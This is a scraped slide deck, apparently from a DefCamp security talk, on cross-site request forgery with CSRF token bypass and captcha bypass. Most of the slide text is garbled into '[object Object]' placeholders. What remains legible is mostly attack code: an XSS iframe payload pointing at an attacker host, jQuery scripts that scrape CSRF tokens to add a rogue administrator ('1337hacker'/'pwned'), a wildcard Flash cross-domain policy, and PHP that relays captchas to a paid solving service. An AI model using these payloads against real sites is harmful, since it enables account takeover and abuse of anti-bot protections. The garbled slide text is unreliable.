Cross Site Request Forgery Attacks

Cross Site Request Forgery Attacks Security token bypass Captcha bypass Presented by Vlad Horatiu [email_address]

Context ,[object Object],[object Object],[object Object]

Principiul de baza ,[object Object],[object Object]

De ce avem nevoie de XSS? ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]

Initierea atacului ,[object Object],<html> <iframe src="http://victimsite.com/index.php?xss=<script>document.write('<iframe src=apos;http://attackerapos;);</script>" width="50" height = "50" style="filter: alpha(opacity=0);-moz-opacity:0;opacity: .0;"> </iframe> </html>

Login check function check() { $.get("login.html", function(data){ if(data.indexOf('blanaa') != -1) { var logged = tryToLogin(); } else { var logged = true; } }); }; function tryToLogin() { $.get("login.html", function(data){ $('#form_frame').contents().find('form').submit(); return (data.indexOf('blanaa') != -1); }); }

Token bypass ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]

Token bypass ,[object Object],function addAdmin() { $.get("http://victimsite.com/admin/add_user.php", function(data){ var token = getBetween('&token=', '&', data); alert(token); $.get("http://victimsite.com/admin/add_user_success.php?user=1337hacker&pass=pwned&token"+token, function(data){ }); }); }; function getBetween(lft, rgt, string) { var split = ''; split = string.split('&token='); split = split[1]; split = split.split('&'); split = split[0]; return split; }

Token bypass ,[object Object],function addAdmin() { $.get("http://victimsite.com/admin/add_user.php", function(data){ var token = getBetween("type=amp;quot;hiddenamp;quot; name=amp;quot;tokenamp;quot; value=amp;quot;", "amp;quot;", data); $.post("http://victimsite.com/admin/add_user.php", { user: "1337hacker", pass: "pwned", token: token }, function(data) {}) }); }; function getBetween(lft, rgt, string) { var split = ''; split = string.split('&token='); split = split[1]; split = split.split('&'); split = split[0]; return split; }

Token bypass ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]

Token bypass ,[object Object],[object Object]

Flash Cross-domain policy ,[object Object],[object Object],[object Object],<cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy>

Captcha bypass ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]

Captcha bypass ,[object Object],$rand = sha1(mt_rand(1000000, 9999999).microtime(true)); if(isset($_GET['path'])) file_put_contents($rand.'.jpg', file_get_contents($_GET['path'])); if ($captcha = $client->upload($rand.'.jpg')) { echo "CAPTCHA {$captcha['captcha']} uploaded"; sleep(DeathByCaptcha_Client::DEFAULT_TIMEOUT); if ($text = $client->get_text($captcha['captcha'])) { echo $text; } else { $client->remove($captcha['captcha']); echo '0'; } }

Captcha bypass ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]

Exemple concrete ,[object Object],[object Object]

Cross Site Request Forgery Attacks

Recommended

Recommended

More Related Content

More from DefCamp

More from DefCamp (20)

Cross Site Request Forgery Attacks